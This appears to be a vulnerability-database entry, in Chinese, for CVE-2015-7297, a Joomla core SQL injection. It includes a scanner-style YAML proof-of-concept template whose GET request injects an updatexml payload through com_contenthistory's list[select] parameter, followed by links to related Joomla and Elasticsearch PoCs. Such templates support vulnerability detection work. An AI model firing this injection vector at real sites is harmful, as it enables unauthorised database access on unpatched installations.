CVE-2015-7297: Joomla Core SQL Injection

漏洞描述

PoC代码[已公开]

id: CVE-2015-7297

info:
    name: Joomla Core SQL Injection
    author: l0ne1y
    severity: high
    verified: true
    description: |-
        Joomla 3.4.4 之前的 3.2  SQL 注入漏洞
        Joomla 中的 SQL 注入漏洞！3.4.4 之前的 3.2 允许远程攻击者通过未指定的向量执行任意 SQL 命令。
    reference:
        - https://www.exploit-db.com/exploits/38797
        - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
        - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
    tags: cve,cve2015,joomla,sqli
    created: 2023/08/02

rules:
    r0:
        request:
            method: GET
            path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)
        expression: response.body.bcontains(b'cf79ae6addba60ad018347359bd144d2')
expression: r0()

相关漏洞推荐

• CVE-2023-23752: Joomla未授权访问漏洞(CVE-2023-23752) POC

  2025-09-01 | Joomla
  Joomla中存在未授权访问漏洞，由于对Web服务端点的访问限制不当，远程攻击者可以绕过安全限制获得Web应用程序敏感信息。 影响版本4.0.0 <= Joomla <= 4.2.7

• joomla-jvehicles-lfi: Joomla! Component com_sef - Local File Inclusion POC

  2025-09-01 | joomla-jvehicles
  A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joom...

• CVE-2007-4504: Joomla! RSfiles <=1.0.2 - Local File Inclusion POC

  2025-08-01 | Joomla
  Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles...

• CVE-2015-1427: ElasticSearch - Remote Code Execution POC

  2025-09-01 | ElasticSearch
  ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox prot...

• CVE-2015-3337: Elasticsearch CVE-2015-3337 POC

  2025-09-01 | Elasticsearch
  fofa app="elastic-Elasticsearch"